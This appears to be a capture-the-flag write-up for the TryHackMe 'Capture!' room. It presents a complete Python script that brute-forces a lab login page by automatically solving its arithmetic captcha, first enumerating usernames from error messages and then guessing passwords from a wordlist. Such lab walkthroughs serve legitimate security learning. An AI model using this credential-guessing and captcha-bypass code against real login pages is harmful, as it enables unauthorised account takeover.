Capture!
https://tryhackme.com/room/capture
This room provide a nice coding challenge. After a couple of failed logins we are prompted with a home made Captcha.
I made a Python script to solve the challenge.
This script attempts to perform a brute force attack on the login page.
It uses Python's "requests" library to send HTTP requests to a website. Then reads a list of usernames and passwords from files, sets the target website's IP address, initializes a session, and defines functions to solve the Captcha and attempt a login with a given username and password.
It then brute forces the username and password by iterating through the lists of usernames and passwords and calling the relevant functions.
The code uses string manipulations to extract information from the response content of the login page.
Note that you could probably simplify the script e.g. by merging the two functions attempt_username(...) and attempt_password(...), but this does the trick.
import requests
# Load username and password lists from files
with open('usernames copy.txt', 'r') as f:
usernames = f.read().splitlines()
with open('passwords copy.txt', 'r') as f:
passwords = f.read().splitlines()
# Change this to the correct IP
IP = "10.10.10.10"
# Initialize session and captcha
session = requests.Session()
captcha = ('1', False)
def solve_captcha(response_content):
# Find the Captcha
start_index = response_content.find('<label for="usr"><b><h3>Captcha enabled</h3></b></label><br>') + len(
'<label for="usr"><b><h3>Captcha enabled</h3></b></label><br>') + 5
end_index = response_content.find('\n', start_index)
line = response_content[start_index:end_index]
tmp = line.split()
a = tmp[0]
b = tmp[2]
opr = tmp[1]
# Solve Capatcha
if opr == "+":
captcha = int(a) + int(b)
elif opr == "-":
captcha = int(a) - int(b)
else:
captcha = int(a) * int(b)
return captcha
def attempt_username(username, password, captcha):
url = f"http://{IP}/login"
params = {'username': username,
'password': password, 'captcha': captcha[0]}
# Send the POST request and get the response content as a string
response = session.post(url, data=params)
response_content = response.text
captcha = solve_captcha(response_content)
if any(s in response_content for s in ("<p class=\"error\"><strong>Error:</strong> The user",
"<p class=\"error\"><strong>Error:</strong> Invalid captcha")):
return captcha, False
else:
return captcha, True
def attempt_password(username, password, captcha):
url = f"http://{IP}/login"
params = {'username': username,
'password': password, 'captcha': captcha[0]}
# Send the POST request and get the response content as a string
response = session.post(url, data=params)
response_content = response.text
try:
captcha = solve_captcha(response_content)
except:
captcha = ('1', False)
if any(s in response_content for s in ("<p class=\"error\"><strong>Error:</strong> Invalid password for user",
"<p class=\"error\"><strong>Error:</strong> Invalid captcha")):
return captcha, False
else:
return captcha, True
# Brute force username
print("Attempting to brute force username...")
for username in usernames:
captcha = attempt_username(username, "test", captcha)
if captcha[1]:
username = username
print(f"Username found: {username}")
break
# Brute force password
print(f"Attempting to brute force password for user \"{username}\"...")
for password in passwords:
captcha = attempt_password(username, password, captcha)
if captcha[1]:
print(f"Password found: {password}")
break
Last updated